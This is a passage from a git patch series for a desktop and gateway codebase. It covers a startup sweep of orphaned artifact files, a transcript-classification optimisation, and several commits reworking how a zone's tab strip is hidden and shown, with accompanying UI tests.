-> orphan+tmp gone, unrelated file kept. --- gateway/browser_control_artifacts.py | 38 ++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) diff --git a/gateway/browser_control_artifacts.py b/gateway/browser_control_artifacts.py index 394d96dfb5..683957646e 100644 --- a/gateway/browser_control_artifacts.py +++ b/gateway/browser_control_artifacts.py @@ -215,6 +215,44 @@ class ArtifactStore: self._clock = clock if clock is not None else time.time self._lock = threading.RLock() self._entries: dict[str, _ArtifactEntry] = {} + # Restart-safe retention: receipts live only in memory, so files + # left behind by a previous process are unreachable but would + # otherwise persist forever. Sweep every artifact-id-shaped file + # (plus stale temps) that has no index entry — at construction the + # index is empty, so anything on disk is an orphan from a dead + # process and past its advertised TTL by definition. + self._sweep_orphan_files() + + def _sweep_orphan_files(self) -> int: + """Delete on-disk artifact files with no live index entry. + + Called at construction (empty index ⇒ everything on disk is an + orphan from a previous process). Only files whose names match the + server-minted 32-hex id shape or the ``*.tmp`` staging suffix are + touched; anything else in the directory is left alone. + """ + removed = 0 + try: + candidates = list(self._root.iterdir()) + except OSError: + return 0 + with self._lock: + live = set(self._entries) + for path in candidates: + if not path.is_file(): + continue + name = path.name + is_temp = name.endswith(".tmp") + if not is_temp and not _ARTIFACT_ID_RE.fullmatch(name): + continue + if not is_temp and name in live: + continue + try: + path.unlink(missing_ok=True) + removed += 1 + except OSError: + continue + return removed # ------------------------------------------------------------------ # Public API From 0b8a848754ecce57081f295cc62709dc5a8713e1 Mon Sep 17 00:00:00 2001 From: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com> Date: Fri, 21 Aug 2026 22:54:04 +0530 Subject: [PATCH 024/161] perf(api): classify compaction rows once per message in run.completed transcript _turn_transcript_messages pre-classified every message with _is_compressed_summary_message (full content flatten + prefix scan), then _message_response re-ran the same classifier inside its projection -- 2x per non-summary row, 3x per summary row on every run.completed emit. The outer guard was redundant: _message_response already yields display_kind hidden for pure handoffs. One projection call per row now. Surfaced by the post-merge simplify re-review of #91517/#91535. --- gateway/platforms/api_server.py | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/gateway/platforms/api_server.py b/gateway/platforms/api_server.py index afba3352f6..25402eba02 100644 --- a/gateway/platforms/api_server.py +++ b/gateway/platforms/api_server.py @@ -6978,13 +6978,14 @@ class APIServerAdapter(BasePlatformAdapter): continue if msg.get("role") not in {"assistant", "tool"}: continue - if _is_compressed_summary_message(msg): - projected = cls._message_response(msg) - if projected.get("display_kind") == "hidden": - continue - out.append(projected) + # _message_response projects compaction scaffolding itself and + # marks pure handoffs display_kind == "hidden"; classifying here + # first would re-run the content classifier (a full content + # flatten + prefix scan) a second time per message. + projected = cls._message_response(msg) + if projected.get("display_kind") == "hidden": continue - out.append(cls._message_response(msg)) + out.append(projected) return out @staticmethod From 3aeb592863950675f424ee46b5180a694859ec79 Mon Sep 17 00:00:00 2001 From: abundantbeing Date: Sat, 15 Aug 2026 01:56:54 +0700 Subject: [PATCH 025/161] fix(desktop): stop tabs double-click-hiding the tab strip; body double-tap reveals it The synthesized double-tap that hides a zone's tab strip rode every tab's pointerdown (generic pane drag and each pane's tabDrag), so a routine double-click on a tab (select a title, retry a click) vanished the whole bar and stranded the zone with no tab, no close X, and no way back but a right-click. Keep the documented hide gesture on the strip background only, and add its inverse as recovery: double-tap a hidden zone's body restores the strip. Regression tests pin both sides of the grammar. --- apps/desktop/src/app/chat/session-drag.ts | 4 +- apps/desktop/src/app/chat/session-tile.tsx | 6 +- apps/desktop/src/app/contrib/surfaces.tsx | 5 +- .../pane-shell/tree/renderer/drag-session.ts | 2 +- .../tree/renderer/tab-strip-hide.test.tsx | 133 ++++++++++++++++++ .../pane-shell/tree/renderer/tree-group.tsx | 76 ++++++++-- 6 files changed, 202 insertions(+), 24 deletions(-) create mode 100644 apps/desktop/src/components/pane-shell/tree/renderer/tab-strip-hide.test.tsx diff --git a/apps/desktop/src/app/chat/session-drag.ts b/apps/desktop/src/app/chat/session-drag.ts index 8c2c5fbe2b..b283b07458 100644 --- a/apps/desktop/src/app/chat/session-drag.ts +++ b/apps/desktop/src/app/chat/session-drag.ts @@ -95,8 +95,8 @@ function tileZoneHost(groupId: string): { chat: boolean; pane: string } | null { /** * Begin dragging a session — a sidebar row OR a tile's own tab (same drop * language either way: stack, split, or composer link). Sub-threshold releases - * stay ordinary clicks, so `opts.onTap` (activate the tile) and `opts.double` - * (hide the tab bar) ride the tab's gestures; Esc aborts instantly. A stack/ + * stay ordinary clicks, so `opts.onTap` (activate the tile) rides the tab's + * gesture; Esc aborts instantly. A stack/ * split commits through `openSessionTile`, which OPENS a new tile from a sidebar * row and MOVES the existing one when its tab is the drag source. */ diff --git a/apps/desktop/src/app/chat/session-tile.tsx b/apps/desktop/src/app/chat/session-tile.tsx index 88432e9b54..0cb0c807a8 100644 --- a/apps/desktop/src/app/chat/session-tile.tsx +++ b/apps/desktop/src/app/chat/session-tile.tsx @@ -616,9 +616,9 @@ export const watchSessionTiles = paneMirror({ ), // A tile's tab drags like a sidebar row — stack / split / drop-to-link — with - // its tap (activate) + double-tap (hide bar) preserved. Always takes the drag. - tabDrag: (storedSessionId, event, onTap, double) => { - startSessionDrag(tileDragPayload(storedSessionId), event, { double, onTap }) + // its tap (activate) preserved. Always takes the drag. + tabDrag: (storedSessionId, event, onTap) => { + startSessionDrag(tileDragPayload(storedSessionId), event, { onTap }) return true }, diff --git a/apps/desktop/src/app/contrib/surfaces.tsx b/apps/desktop/src/app/contrib/surfaces.tsx index d2108a751f..e191e40011 100644 --- a/apps/desktop/src/app/contrib/surfaces.tsx +++ b/apps/desktop/src/app/contrib/surfaces.tsx @@ -147,9 +147,8 @@ export const ChatRoutesSurface = memo(function ChatRoutesSurface({ /> ) - // FULL-PAGE views (not chat) mark the zone body `data-zone-no-header`: a - // page is not a tab-able surface, so the zone's double-click header toggle - // stands down while one is showing (see onZoneDoubleClick). + // FULL-PAGE views (not chat): a page is not a tab-able surface, so the + // zone's tab strip stands down while one is showing (paneChrome.headerVeto). const page = (view: ReactNode) => (
{view} diff --git a/apps/desktop/src/components/pane-shell/tree/renderer/drag-session.ts b/apps/desktop/src/components/pane-shell/tree/renderer/drag-session.ts index 826f15d4b9..6066bb0eab 100644 --- a/apps/desktop/src/components/pane-shell/tree/renderer/drag-session.ts +++ b/apps/desktop/src/components/pane-shell/tree/renderer/drag-session.ts @@ -158,7 +158,7 @@ const sameHint = (a: DropHint | null, b: DropHint | null) => /** Double-tap detection for drag handles. Pane handles preventDefault * pointerdown, which suppresses native `dblclick` — so rapid same-handle * taps are detected here instead. */ -const DOUBLE_TAP_MS = 400 +export const DOUBLE_TAP_MS = 400 let lastTap: { key: string; time: number } | null = null export interface DoubleTapContext { diff --git a/apps/desktop/src/components/pane-shell/tree/renderer/tab-strip-hide.test.tsx b/apps/desktop/src/components/pane-shell/tree/renderer/tab-strip-hide.test.tsx new file mode 100644 index 0000000000..4851e3ffdf --- /dev/null +++ b/apps/desktop/src/components/pane-shell/tree/renderer/tab-strip-hide.test.tsx @@ -0,0 +1,133 @@ +import { useStore } from '@nanostores/react' +import { cleanup, fireEvent, render } from '@testing-library/react' +import { afterEach, beforeAll, beforeEach, describe, expect, it, vi } from 'vitest' + +import { registry } from '@/contrib/registry' + +import { group, split } from '../model' +import { $layoutTree, markCollapsePane, registerPaneCloser } from '../store' + +import { TreeGroup } from './tree-group' + +/** TreeGroup reads its node from props; subscribe so store writes re-render. */ +function LiveTreeGroup() { + useStore($layoutTree) + + return +} + +// Pins the tab-strip hide/recovery grammar: hiding the strip is an EXPLICIT +// verb (zone menu / main tab menu) — a double-click on a tab must NOT vanish +// the bar (it used to, stranding the zone with no ✕), and a double-tap on the +// zone body restores a strip that WAS hidden explicitly. + +class TestResizeObserver { + observe() {} + unobserve() {} + disconnect() {} +} + +beforeAll(() => { + vi.stubGlobal('ResizeObserver', TestResizeObserver) + // jsdom lacks CSS.escape, which tab-strip-scroll uses in a layout effect. + vi.stubGlobal('CSS', { ...globalThis.CSS, escape: (value: string) => value }) + Element.prototype.hasPointerCapture ??= () => false + Element.prototype.setPointerCapture ??= () => undefined + Element.prototype.releasePointerCapture ??= () => undefined + HTMLElement.prototype.scrollIntoView ??= () => undefined +}) + +const disposers: (() => void)[] = [] + +beforeEach(async () => { + window.localStorage.clear() + + const { $dismissedPanes, $hiddenTreePanes } = await import('../store') + $dismissedPanes.set(new Set()) + $hiddenTreePanes.set(new Set()) + + for (const [id, data] of [ + ['workspace', { placement: 'main', uncloseable: true }], + ['terminal', { placement: 'bottom' }] + ] as const) { + disposers.push(registry.register({ area: 'panes', data, id, render: () => null, title: id })) + } + + markCollapsePane('terminal') + registerPaneCloser('terminal', () => undefined) +}) + +afterEach(() => { + cleanup() + disposers.splice(0).forEach(dispose => dispose()) +}) + +const zoneAt = (index: number) => { + const node = $layoutTree.get()! + + return (node.type === 'split' ? node.children[index] : node) as never +} + +const groupNode = () => { + const node = $layoutTree.get()! + + return (node.type === 'split' ? node.children[0] : node) as { headerHidden?: boolean; panes: string[] } +} + +const tablist = () => document.querySelector('[role="tablist"]') + +const doublePointerDown = (target: Element) => { + fireEvent.pointerDown(target, { button: 0, pointerType: 'mouse' }) + fireEvent.pointerDown(target, { button: 0, pointerType: 'mouse' }) +} + +describe('tab strip hide/recovery grammar', () => { + it('double-clicking a tab does NOT hide the strip', () => { + // $layoutTree.set, not declareDefaultTree — the latter only adopts into an + // existing tree, and the store is module state that survives between tests. + $layoutTree.set( + split('column', [group(['workspace', 'terminal'], { active: 'terminal', id: 'grp-main' })]) + ) + render() + + const tab = document.querySelector('[data-tree-tab="terminal"]') + expect(tab).toBeTruthy() + + doublePointerDown(tab!) + + // The strip is still there and the tree never recorded a hide. + expect(tablist()).toBeTruthy() + expect(groupNode().headerHidden).not.toBe(true) + }) + + it('double-tapping the zone body restores an explicitly hidden strip', () => { + $layoutTree.set( + split('column', [group(['terminal'], { active: 'terminal', headerHidden: true, id: 'grp-tools' })]) + ) + render() + + // Hidden strip: no tablist, no ✕ anywhere in the zone. + expect(tablist()).toBeNull() + + const body = document.querySelector('[data-tree-group="grp-tools"]') + expect(body).toBeTruthy() + + doublePointerDown(body!) + + expect(tablist()).toBeTruthy() + expect(groupNode().headerHidden).toBe(false) + }) + + it('a single body tap does not toggle the strip back', () => { + $layoutTree.set( + split('column', [group(['terminal'], { active: 'terminal', headerHidden: true, id: 'grp-tools' })]) + ) + render() + + const body = document.querySelector('[data-tree-group="grp-tools"]')! + fireEvent.pointerDown(body, { button: 0, pointerType: 'mouse' }) + + expect(tablist()).toBeNull() + expect(groupNode().headerHidden).toBe(true) + }) +}) diff --git a/apps/desktop/src/components/pane-shell/tree/renderer/tree-group.tsx b/apps/desktop/src/components/pane-shell/tree/renderer/tree-group.tsx index 481dfd02e5..94bae355a7 100644 --- a/apps/desktop/src/components/pane-shell/tree/renderer/tree-group.tsx +++ b/apps/desktop/src/components/pane-shell/tree/renderer/tree-group.tsx @@ -10,7 +10,15 @@ */ import { useStore } from '@nanostores/react' -import { type CSSProperties, Fragment, type ReactNode, type RefObject, useRef, useState } from 'react' +import { + type CSSProperties, + Fragment, + type ReactNode, + type PointerEvent as ReactPointerEvent, + type RefObject, + useRef, + useState +} from 'react' import { ActionsContextMenu, type MenuKit, renderActionItem } from '@/components/ui/actions-menu' import { Codicon } from '@/components/ui/codicon' @@ -71,7 +79,7 @@ import { toggleTabSelected } from '../tab-selection' -import { type DoubleTapContext, startPaneDrag } from './drag-session' +import { DOUBLE_TAP_MS, type DoubleTapContext, startPaneDrag } from './drag-session' import { forceLoneHeaderForPanes } from './lone-header' import { useActiveTabVisible } from './tab-strip-scroll' import { paneChrome } from './track-model' @@ -291,9 +299,14 @@ export function TreeGroup({ tabCount: shown.length }) - // Drag handles preventDefault pointerdown (no native dblclick), so the - // header + chips share a synthesized double-tap: restore if collapsed - // (undoing the first tap's minimize toggle) and hide the chrome. + // The STRIP background keeps the synthesized double-tap hide — it is the + // documented explicit gesture (model.ts) and the open PR #84458 reveal edge + // is its recovery for that surface. TABS must not carry it: a tab is where + // people double-click for mundane reasons (select a title, retry a click), + // and every tab drag forwarded the gesture, so a routine double-click + // vanished the whole bar and stranded the zone with no ✕ and no way back + // but a right-click. The body below carries the inverse gesture as the + // recovery path when a strip IS hidden. const hideHeaderDoubleTap: DoubleTapContext = { key: `hide-header-${node.id}`, onDoubleTap: () => { @@ -302,6 +315,38 @@ export function TreeGroup({ } } + // Recovery for an explicitly hidden strip: double-tap the zone BODY brings + // the bar back. The body is otherwise inert (panes own their clicks; drags + // engage past a movement threshold), so the gesture can't fire by accident. + const showHeaderDoubleTap: DoubleTapContext = { + key: `show-header-${node.id}`, + onDoubleTap: () => setTreeGroupHeaderHidden(node.id, false) + } + + const bodyTapRef = useRef<{ time: number; x: number; y: number } | null>(null) + + const onBodyPointerDown = (event: ReactPointerEvent) => { + if (event.button !== 0 || !headerHidden || node.minimized || editMode) { + return + } + + const now = Date.now() + const last = bodyTapRef.current + + if ( + last && + now - last.time < DOUBLE_TAP_MS && + Math.hypot(event.clientX - last.x, event.clientY - last.y) < 24 + ) { + bodyTapRef.current = null + showHeaderDoubleTap.onDoubleTap() + + return + } + + bodyTapRef.current = { time: now, x: event.clientX, y: event.clientY } + } + // Zone-menu close targets read the layout tree, but this component must NOT // subscribe to it: `useStore($layoutTree)` here wires every zone — and // therefore every mounted pane and its whole transcript — to the entire @@ -355,11 +400,10 @@ export function TreeGroup({ targetPane } - // NO body double-click toggle: virtualized content (the thread) recreates - // its nodes between clicks, so the gesture was hopelessly unreliable. The - // bar's lifecycle is explicit instead — gaining a tab sticky-shows it - // (insertAtGroup pins headerHidden false), the main tab's context menu - // hides it, and full-page views veto it via paneChrome.headerVeto. + // The bar's lifecycle is explicit: gaining a tab sticky-shows it + // (insertAtGroup pins headerHidden false), the zone menu (and the main + // tab's menu) hide it, full-page views veto it via paneChrome.headerVeto, + // and a double-tap on the body restores it while hidden. return (
{ setMenuPane((e.target as HTMLElement).closest('[data-tree-tab]')?.getAttribute('data-tree-tab') ?? undefined) }} + onPointerDown={onBodyPointerDown} ref={ref} style={wcOverlap ? { paddingTop: wcOverlap.y + wcOverlap.height } : undefined} > @@ -442,8 +487,9 @@ export function TreeGroup({ listRef={tabsRef} onPointerDown={e => // Tap the header to collapse to it / expand back — the DetailPane - // / sidebar-section gesture (never for the main zone). Double-tap - // hides the header entirely. Drag still moves the pane. + // / sidebar-section gesture (never for the main zone). The + // double-tap hide rides the strip background below, not the tabs. + // Drag still moves the pane. startPaneDrag( activeId, e, @@ -545,7 +591,7 @@ export function TreeGroup({ e, onTap, stripRef.current ? { groupId: node.id, strip: stripRef.current } : undefined, - hideHeaderDoubleTap, + undefined, t.zones.tabCount(dragSelection.length), dragSelection ) @@ -557,13 +603,13 @@ export function TreeGroup({ // session drop language — link/stack/split); `false` defers // to the generic pane move (the workspace tab on a fresh // draft has no session to link). - if (!chrome.tabDrag?.(e, onTap, hideHeaderDoubleTap)) { + if (!chrome.tabDrag?.(e, onTap)) { startPaneDrag( paneId, e, onTap, stripRef.current ? { groupId: node.id, strip: stripRef.current } : undefined, - hideHeaderDoubleTap, + undefined, title ) } From 001a4c91c62af643f96257d867a9538da98925f9 Mon Sep 17 00:00:00 2001 From: yoniebans Date: Fri, 21 Aug 2026 16:26:13 +0300 Subject: [PATCH 026/161] fix(desktop): scope the salvaged fix to the failure-path removal Narrows #86278 to exactly the defect. Tabs pass no double-tap context on any press path (generic pane drag, multi-tab selection drag, chrome.tabDrag), so a double-click on a tab can no longer hide the strip; the strip background keeps its documented hide gesture unchanged. The body double-tap reveal from #86278 is dropped: the zone body deliberately carries no double-click gesture (virtualized content recreates its nodes between clicks, per the standing ruling in tree-group.tsx), and recovery surfaces for a deliberately hidden header are being decided separately across #84458 / #81638 / #89225. The DOUBLE_TAP_MS export is reverted since no consumer remains outside drag-session. Test file trimmed to the two assertions that pin the grammar: a tab double-tap must not hide the strip (red on main), the strip background double-tap still hides. Taps release on window between presses so the drag-session synthesized double-tap path is the one exercised. --- .../pane-shell/tree/renderer/drag-session.ts | 2 +- .../tree/renderer/tab-strip-hide.test.tsx | 51 +++++--------- .../pane-shell/tree/renderer/tree-group.tsx | 66 ++++--------------- 3 files changed, 30 insertions(+), 89 deletions(-) diff --git a/apps/desktop/src/components/pane-shell/tree/renderer/drag-session.ts b/apps/desktop/src/components/pane-shell/tree/renderer/drag-session.ts index 6066bb0eab..826f15d4b9 100644 --- a/apps/desktop/src/components/pane-shell/tree/renderer/drag-session.ts +++ b/apps/desktop/src/components/pane-shell/tree/renderer/drag-session.ts @@ -158,7 +158,7 @@ const sameHint = (a: DropHint | null, b: DropHint | null) => /** Double-tap detection for drag handles. Pane handles preventDefault * pointerdown, which suppresses native `dblclick` — so rapid same-handle * taps are detected here instead. */ -export const DOUBLE_TAP_MS = 400 +const DOUBLE_TAP_MS = 400 let lastTap: { key: string; time: number } | null = null export interface DoubleTapContext { diff --git a/apps/desktop/src/components/pane-shell/tree/renderer/tab-strip-hide.test.tsx b/apps/desktop/src/components/pane-shell/tree/renderer/tab-strip-hide.test.tsx index 4851e3ffdf..415c87965f 100644 --- a/apps/desktop/src/components/pane-shell/tree/renderer/tab-strip-hide.test.tsx +++ b/apps/desktop/src/components/pane-shell/tree/renderer/tab-strip-hide.test.tsx @@ -16,10 +16,8 @@ function LiveTreeGroup() { return } -// Pins the tab-strip hide/recovery grammar: hiding the strip is an EXPLICIT -// verb (zone menu / main tab menu) — a double-click on a tab must NOT vanish -// the bar (it used to, stranding the zone with no ✕), and a double-tap on the -// zone body restores a strip that WAS hidden explicitly. +// Pins the tab-strip hide grammar: the double-tap hide belongs to the STRIP +// BACKGROUND alone — tabs are activate-only and must never hide the bar. class TestResizeObserver { observe() {} @@ -74,14 +72,18 @@ const groupNode = () => { return (node.type === 'split' ? node.children[0] : node) as { headerHidden?: boolean; panes: string[] } } -const tablist = () => document.querySelector('[role="tablist"]') +const tablist = () => globalThis.document.querySelector('[role="tablist"]') -const doublePointerDown = (target: Element) => { - fireEvent.pointerDown(target, { button: 0, pointerType: 'mouse' }) - fireEvent.pointerDown(target, { button: 0, pointerType: 'mouse' }) +/** Two sub-threshold taps: pointerdown on the target, pointerup on window + * (drag-session listens there), twice — the synthesized double-tap path. */ +const doubleTap = (target: Element) => { + for (let i = 0; i < 2; i++) { + fireEvent.pointerDown(target, { button: 0, clientX: 10, clientY: 10, pointerType: 'mouse' }) + fireEvent.pointerUp(window, { button: 0, clientX: 10, clientY: 10, pointerType: 'mouse' }) + } } -describe('tab strip hide/recovery grammar', () => { +describe('tab strip hide grammar', () => { it('double-clicking a tab does NOT hide the strip', () => { // $layoutTree.set, not declareDefaultTree — the latter only adopts into an // existing tree, and the store is module state that survives between tests. @@ -90,44 +92,27 @@ describe('tab strip hide/recovery grammar', () => { ) render() - const tab = document.querySelector('[data-tree-tab="terminal"]') + const tab = globalThis.document.querySelector('[data-tree-tab="terminal"]') expect(tab).toBeTruthy() - doublePointerDown(tab!) + doubleTap(tab!) // The strip is still there and the tree never recorded a hide. expect(tablist()).toBeTruthy() expect(groupNode().headerHidden).not.toBe(true) }) - it('double-tapping the zone body restores an explicitly hidden strip', () => { + it('double-tapping the strip background still hides the header (documented gesture)', () => { $layoutTree.set( - split('column', [group(['terminal'], { active: 'terminal', headerHidden: true, id: 'grp-tools' })]) + split('column', [group(['workspace', 'terminal'], { active: 'terminal', id: 'grp-main' })]) ) render() - // Hidden strip: no tablist, no ✕ anywhere in the zone. - expect(tablist()).toBeNull() + const strip = globalThis.document.querySelector('[data-zone-tabstrip="grp-main"]') + expect(strip).toBeTruthy() - const body = document.querySelector('[data-tree-group="grp-tools"]') - expect(body).toBeTruthy() + doubleTap(strip!) - doublePointerDown(body!) - - expect(tablist()).toBeTruthy() - expect(groupNode().headerHidden).toBe(false) - }) - - it('a single body tap does not toggle the strip back', () => { - $layoutTree.set( - split('column', [group(['terminal'], { active: 'terminal', headerHidden: true, id: 'grp-tools' })]) - ) - render() - - const body = document.querySelector('[data-tree-group="grp-tools"]')! - fireEvent.pointerDown(body, { button: 0, pointerType: 'mouse' }) - - expect(tablist()).toBeNull() expect(groupNode().headerHidden).toBe(true) }) }) diff --git a/apps/desktop/src/components/pane-shell/tree/renderer/tree-group.tsx b/apps/desktop/src/components/pane-shell/tree/renderer/tree-group.tsx index 94bae355a7..8f269dc1a7 100644 --- a/apps/desktop/src/components/pane-shell/tree/renderer/tree-group.tsx +++ b/apps/desktop/src/components/pane-shell/tree/renderer/tree-group.tsx @@ -10,15 +10,7 @@ */ import { useStore } from '@nanostores/react' -import { - type CSSProperties, - Fragment, - type ReactNode, - type PointerEvent as ReactPointerEvent, - type RefObject, - useRef, - useState -} from 'react' +import { type CSSProperties, Fragment, type ReactNode, type RefObject, useRef, useState } from 'react' import { ActionsContextMenu, type MenuKit, renderActionItem } from '@/components/ui/actions-menu' import { Codicon } from '@/components/ui/codicon' @@ -79,7 +71,7 @@ import { toggleTabSelected } from '../tab-selection' -import { DOUBLE_TAP_MS, type DoubleTapContext, startPaneDrag } from './drag-session' +import { type DoubleTapContext, startPaneDrag } from './drag-session' import { forceLoneHeaderForPanes } from './lone-header' import { useActiveTabVisible } from './tab-strip-scroll' import { paneChrome } from './track-model' @@ -299,14 +291,10 @@ export function TreeGroup({ tabCount: shown.length }) - // The STRIP background keeps the synthesized double-tap hide — it is the - // documented explicit gesture (model.ts) and the open PR #84458 reveal edge - // is its recovery for that surface. TABS must not carry it: a tab is where - // people double-click for mundane reasons (select a title, retry a click), - // and every tab drag forwarded the gesture, so a routine double-click - // vanished the whole bar and stranded the zone with no ✕ and no way back - // but a right-click. The body below carries the inverse gesture as the - // recovery path when a strip IS hidden. + // The STRIP background owns the synthesized double-tap hide — it is the + // documented explicit gesture (model.ts). TABS never carry it: a tab is + // where people double-click for mundane reasons (select a title, retry a + // click), so tab presses pass no double-tap context and stay activate-only. const hideHeaderDoubleTap: DoubleTapContext = { key: `hide-header-${node.id}`, onDoubleTap: () => { @@ -315,38 +303,6 @@ export function TreeGroup({ } } - // Recovery for an explicitly hidden strip: double-tap the zone BODY brings - // the bar back. The body is otherwise inert (panes own their clicks; drags - // engage past a movement threshold), so the gesture can't fire by accident. - const showHeaderDoubleTap: DoubleTapContext = { - key: `show-header-${node.id}`, - onDoubleTap: () => setTreeGroupHeaderHidden(node.id, false) - } - - const bodyTapRef = useRef<{ time: number; x: number; y: number } | null>(null) - - const onBodyPointerDown = (event: ReactPointerEvent) => { - if (event.button !== 0 || !headerHidden || node.minimized || editMode) { - return - } - - const now = Date.now() - const last = bodyTapRef.current - - if ( - last && - now - last.time < DOUBLE_TAP_MS && - Math.hypot(event.clientX - last.x, event.clientY - last.y) < 24 - ) { - bodyTapRef.current = null - showHeaderDoubleTap.onDoubleTap() - - return - } - - bodyTapRef.current = { time: now, x: event.clientX, y: event.clientY } - } - // Zone-menu close targets read the layout tree, but this component must NOT // subscribe to it: `useStore($layoutTree)` here wires every zone — and // therefore every mounted pane and its whole transcript — to the entire @@ -400,10 +356,11 @@ export function TreeGroup({ targetPane } - // The bar's lifecycle is explicit: gaining a tab sticky-shows it - // (insertAtGroup pins headerHidden false), the zone menu (and the main - // tab's menu) hide it, full-page views veto it via paneChrome.headerVeto, - // and a double-tap on the body restores it while hidden. + // NO body double-click toggle: virtualized content (the thread) recreates + // its nodes between clicks, so the gesture was hopelessly unreliable. The + // bar's lifecycle is explicit instead — gaining a tab sticky-shows it + // (insertAtGroup pins headerHidden false), the main tab's context menu + // hides it, and full-page views veto it via paneChrome.headerVeto. return (
{ setMenuPane((e.target as HTMLElement).closest('[data-tree-tab]')?.getAttribute('data-tree-tab') ?? undefined) }} - onPointerDown={onBodyPointerDown} ref={ref} style={wcOverlap ? { paddingTop: wcOverlap.y + wcOverlap.height } : undefined} > From 315307f139d0db8c10e3c9cd9a52f4750eab58af Mon Sep 17 00:00:00 2001 From: Brooklyn Nicholson Date: Fri, 21 Aug 2026 13:25:15 -0500 Subject: [PATCH 027/161] refactor(desktop): make a zone's tab strip a stated mode, not a flag five paths wrote MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit `headerHidden` carried two meanings at once. `true` was either "the user hid this" or "a double-tap nobody meant hid this"; `false` was either "the user wants a strip" or "insert / tab-cycling / dock-enforce / adoption pinned one to escape a dead end". Because the layout wrote the same field the user did, a repair silently overwrote a preference and neither could be read back — and since hiding also unmounted the tab, the ✕ and the menu offering "Show header", a zone that got hidden by accident stayed that way across restarts. Replaces it with `tabStrip?: 'always' | 'never'`, where absent is auto and only the user ever writes it, and moves the decision into one resolver that TreeGroup and the store both call, so the strip on screen and the toggle command cannot disagree. Reachability moves into that resolver as an invariant that outranks an explicit `never`: a closeable tile keeps its ✕ and a lone tool panel keeps its chip, because "hide the chrome" is never a request to make a surface unreachable. With that guarantee held centrally, the four repair writes are gone. Persisted `headerHidden` is dropped rather than translated — nothing on disk distinguishes a deliberate hide from an accidental one, and carrying the accidents forward would re-strand exactly the people who reported being stuck. The double-tap hide goes with it, along with the synthesized double-tap detector it was the only consumer of. It fired from ordinary double-clicks on a tab, nothing announced it, and its undo lived behind the chrome it had just removed. `data-zone-no-header` goes too: it marked full-page views for a body double-click toggle that no longer exists, and nothing has read it since. Supersedes the tab-side half of the fix from abundantbeing and yoniebans, whose commits this builds on. --- apps/desktop/src/app/chat/pane-mirror.ts | 13 +- apps/desktop/src/app/chat/session-drag.ts | 10 +- apps/desktop/src/app/chat/session-tile.tsx | 4 +- apps/desktop/src/app/contrib/controller.tsx | 5 +- apps/desktop/src/app/contrib/surfaces.tsx | 9 +- .../pane-shell/tree/dock-enforce.test.ts | 15 ++- .../src/components/pane-shell/tree/model.ts | 84 ++++++++---- .../pane-shell/tree/renderer/drag-session.ts | 51 +++---- .../tree/renderer/lone-header.test.ts | 37 ------ .../pane-shell/tree/renderer/lone-header.ts | 35 ----- .../tree/renderer/strip-visibility.test.ts | 113 ++++++++++++++++ .../tree/renderer/strip-visibility.ts | 108 +++++++++++++++ .../tree/renderer/tab-strip-hide.test.tsx | 60 +++++---- .../pane-shell/tree/renderer/track-model.ts | 9 +- .../tree/renderer/tree-group.test.tsx | 4 +- .../pane-shell/tree/renderer/tree-group.tsx | 102 ++++++-------- .../src/components/pane-shell/tree/store.ts | 124 +++++++++++------- .../tree/tabstrip-migration.test.ts | 60 +++++++++ .../pane-shell/tree/tool-pane-toggle.test.ts | 24 ++-- apps/desktop/src/i18n/ar.ts | 4 +- apps/desktop/src/i18n/en.ts | 4 +- apps/desktop/src/i18n/ja.ts | 4 +- apps/desktop/src/i18n/types.ts | 4 +- apps/desktop/src/i18n/zh-hant.ts | 4 +- apps/desktop/src/i18n/zh.ts | 4 +- apps/desktop/src/store/tabstrip-prefs.ts | 38 ++++++ 26 files changed, 609 insertions(+), 320 deletions(-) delete mode 100644 apps/desktop/src/components/pane-shell/tree/renderer/lone-header.test.ts delete mode 100644 apps/desktop/src/components/pane-shell/tree/renderer/lone-header.ts create mode 100644 apps/desktop/src/components/pane-shell/tree/renderer/strip-visibility.test.ts create mode 100644 apps/desktop/src/components/pane-shell/tree/renderer/strip-visibility.ts create mode 100644 apps/desktop/src/components/pane-shell/tree/tabstrip-migration.test.ts create mode 100644 apps/desktop/src/store/tabstrip-prefs.ts diff --git a/apps/desktop/src/app/chat/pane-mirror.ts b/apps/desktop/src/app/chat/pane-mirror.ts index 916b64500c..3a6995e1b4 100644 --- a/apps/desktop/src/app/chat/pane-mirror.ts +++ b/apps/desktop/src/app/chat/pane-mirror.ts @@ -9,7 +9,6 @@ import type { ReadableAtom } from 'nanostores' import type { ReactElement, ReactNode, PointerEvent as ReactPointerEvent } from 'react' -import type { DoubleTapContext } from '@/components/pane-shell/tree/renderer/drag-session' import { registerPaneCloser, removeTreePane, treePanesWithPrefix } from '@/components/pane-shell/tree/store' import { registry } from '@/contrib/registry' import type { TileDock } from '@/store/session-states' @@ -44,12 +43,7 @@ export interface PaneMirror { tabWrap?: (key: string, tab: ReactElement) => ReactNode /** Override the tile's TAB drag (session drop language: stack/split/link). * Returns whether it took the drag (see PaneChrome.tabDrag). */ - tabDrag?: ( - key: string, - event: ReactPointerEvent, - onTap: () => void, - double?: DoubleTapContext - ) => boolean + tabDrag?: (key: string, event: ReactPointerEvent, onTap: () => void) => boolean /** Wired as the pane's closer (tab Close). */ close: (key: string) => void } @@ -89,11 +83,10 @@ export function paneMirror(cfg: PaneMirror): () => void { minWidth: cfg.minWidth, // Every mirrored tile is a full workspace surface docked beside main — // and closeable, which is what keeps its tab when it lands in a zone of - // its own (see lone-header.ts). + // its own (see strip-visibility.ts). placement: 'main', tabDrag: cfg.tabDrag - ? (event: ReactPointerEvent, onTap: () => void, double?: DoubleTapContext) => - cfg.tabDrag!(key, event, onTap, double) + ? (event: ReactPointerEvent, onTap: () => void) => cfg.tabDrag!(key, event, onTap) : undefined, // returns boolean (handled) — see PaneChrome.tabDrag tabWrap: cfg.tabWrap ? (tab: ReactElement) => cfg.tabWrap!(key, tab) : undefined }, diff --git a/apps/desktop/src/app/chat/session-drag.ts b/apps/desktop/src/app/chat/session-drag.ts index b283b07458..5aebe63323 100644 --- a/apps/desktop/src/app/chat/session-drag.ts +++ b/apps/desktop/src/app/chat/session-drag.ts @@ -30,7 +30,6 @@ import type { PointerEvent as ReactPointerEvent } from 'react' import { queryAllVisible } from '@/components/pane-shell/pane-visibility' import { findGroup } from '@/components/pane-shell/tree/model' import { - type DoubleTapContext, rectContains, slotBefore, snapshotStrips, @@ 